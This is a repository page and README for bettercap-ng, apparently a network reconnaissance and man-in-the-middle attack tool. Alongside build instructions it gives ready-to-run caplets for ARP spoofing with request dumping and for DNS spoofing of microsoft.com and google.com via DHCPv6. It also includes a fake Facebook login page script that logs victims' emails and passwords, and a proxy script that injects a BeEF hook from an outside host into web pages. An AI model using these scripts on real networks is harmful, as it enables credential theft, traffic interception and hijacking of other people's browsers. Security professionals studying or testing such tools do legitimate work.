The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
Find a file
2018-02-17 02:52:43 +01:00
caplets misc: small fix or general refactoring i did not bother commenting 2018-02-17 02:47:42 +01:00
core docs: added basic per-package documentation 2018-02-11 20:38:59 +01:00
firewall refact: renamed package net to network to avoid collision with golang net package. 2018-02-15 21:34:46 +01:00
log misc: small fix or general refactoring i did not bother commenting 2018-02-11 20:45:29 +01:00
media balls 2018-02-10 18:34:43 +01:00
modules misc: small fix or general refactoring i did not bother commenting 2018-02-17 02:52:43 +01:00
network new: implemented channel hopping for wifi.recon module ( ref #53 ) 2018-02-17 02:41:10 +01:00
packets misc: small fix or general refactoring i did not bother commenting 2018-02-17 01:57:14 +01:00
session Fix #54: cmd parsing improved. It is possible set multiple command on ticker.commands with single or double quote. 2018-02-16 18:31:56 +01:00
tls docs: added basic per-package documentation 2018-02-11 20:38:59 +01:00
.gitignore misc: small fix or general refactoring i did not bother commenting 2018-02-11 18:57:40 +01:00
.travis.yml fix: added libpcap-dev to travis file. 2018-01-07 16:57:06 +01:00
build.sh misc: small fix or general refactoring i did not bother commenting 2018-02-11 21:18:09 +01:00
Dockerfile fix: explicitly adding iptables to the Dockerfile ( ref #28 ) 2018-02-06 16:02:50 +01:00
ISSUE_TEMPLATE.md balls 2018-01-29 12:44:39 +01:00
LICENSE.md preparing for github 2018-01-07 16:29:56 +01:00
main.go misc: small fix or general refactoring i did not bother commenting 2018-02-16 22:49:49 +01:00
Makefile refact: got rid of go-bindata using a simple py script (fixes #51) 2018-02-15 22:03:20 +01:00
README.md misc: small fix or general refactoring i did not bother commenting 2018-02-16 20:38:38 +01:00
release.sh misc: small fix or general refactoring i did not bother commenting 2018-02-11 18:18:25 +01:00

BetterCap

Release Software License Travis Go Report Card

bettercap-ng is a complete reimplementation of bettercap, the Swiss army knife for network attacks and monitoring. It is faster, stabler, smaller, easier to install and to use.

Using it with Docker

In this repository, BetterCAP is containerized using Alpine Linux - a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies.

To pull latest BetterCAP version of the image:

$ docker pull evilsocket/bettercap-ng

To run:

$ docker run -it --privileged --net=host evilsocket/bettercap-ng -h

Compilation

Make sure you have a correctly configured Go >= 1.8 environment, that $GOPATH/bin is in $PATH and the libpcap-dev package installed for your system, then:

$ go get github.com/evilsocket/bettercap-ng

This command will download bettercap-ng, install its dependencies, compile it and move the bettercap-ng executable to $GOPATH/bin.

Now you can use sudo bettercap-ng -h to show the basic command line options and just sudo bettercap-ng to start an interactive session on your default network interface.

Compilation on Windows

Despite Windows support is not yet 100% complete, it is possible to build bettercap-ng for Microsoft platforms and enjoy 99.99% of the experience. The steps to prepare the building environment are:

  • Install go amd64 (add go binaries to your %PATH%).
  • Install TDM GCC for amd64 (add TDM-GCC binaries to your %PATH%).
  • Also add TDM-GCC\x86_64-w64-mingw32\bin to your %PATH%.
  • Install winpcap.
  • Download Winpcap developer's pack and extract it to C:\.
  • Find wpcap.dll and packet.dll in your PC (typically in c:\windows\system32).
  • Copy them to some other temp folder or else you'll have to supply Admin privs to the following commands.
  • Run gendef on those files: gendef wpcap.dll and gendef packet.dll (obtainable with MinGW Installation Manager, package mingw32-gendef).

This will generate .def files, now we'll generate the static libraries files:

  • Run dlltool --as-flags=--64 -m i386:x86-64 -k --output-lib libwpcap.a --input-def wpcap.def.
  • and dlltool --as-flags=--64 -m i386:x86-64 -k --output-lib libpacket.a --input-def packet.def.
  • Copy both libwpcap.a and libpacket.a to c:\WpdPack\Lib\x64.

And eventually just go get github.com/evilsocket/bettercap-ng as you would do on other platforms.

Cross Compilation

As an example, let's cross compile bettercap for ARM (requires gcc-arm-linux-gnueabi, yacc and flex packages).

Download and cross compile libpcap-1.8.1 for ARM (adjust PCAPV to use a different libpcap version):

cd /tmp
export PCAPV=1.8.1
wget http://www.tcpdump.org/release/libpcap-$PCAPV.tar.gz
tar xvf libpcap-$PCAPV.tar.gz
cd libpcap-$PCAPV
export CC=arm-linux-gnueabi-gcc
./configure --host=arm-linux --with-pcap=linux
make

Cross compile bettercap-ng itself:

cd $GOPATH/src/github.com/evilsocket/bettercap-ng
env CC=arm-linux-gnueabi-gcc CGO_ENABLED=1 GOOS=linux GOARCH=arm CGO_LDFLAGS="-L/tmp/libpcap-$PCAPV" make

Interactive Mode

If no -caplet option is specified, bettercap-ng will start in interactive mode, allowing you to start and stop modules manually, change options and apply new firewall rules on the fly.

To get a grasp of what you can do, type help and the general help menu will be shown, you can also have module specific help by using help module-name (for instance try with help net.recon).

To print all variables and their values instead, you can use get * or get variable-name to get a single variable (try with get gateway.address), to set a new value you can simply set variable-name new-value (a value of "" will clear the variable contents).

Caplets

Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.

caplets/http-req-dump.cap

Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dumsp.js proxy script.

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

caplets/netmon.cap

An example of how to use the ticker module, use this caplet to monitor activities on your network.

net.probe on
clear
ticker on

caplets/mitm6.cap

Reroute IPv4 DNS requests by using DHCPv6 replies, start a HTTP server and DNS spoofer for microsoft.com and google.com.

# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

caplets/rest-api.cap

Start a rest API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on

# enjoy /api/session and /api/events
api.rest on

Get information about the current session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

Get last 50 events:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/events?n=50

Clear events:

curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/fb-phish.cap

This caplet will create a fake Facebook login page on port 80, intercept login attempts using the http.proxy, print credentials and redirect the target to the real Facebook.

Make sure to create the folder first:

$ cd caplets/www/
$ make
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on

The caplets/fb-phish.js proxy script file:

function onRequest(req, res) {
    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
        var form = req.ParseForm();
        var email = form["email"] || "?", 
            pass  = form["pass"] || "?";

        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );

        res.Status      = 301;
        res.Headers     = "Location: https://www.facebook.com/\n" +
                          "Connection: close";
    }
}

caplets/beef-inject.cap

Use a proxy script to inject a BEEF javascript hook:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

The caplets/beef.inject.js proxy script file:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
        }
    }
}

License

bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they're released under the GPL 3 license.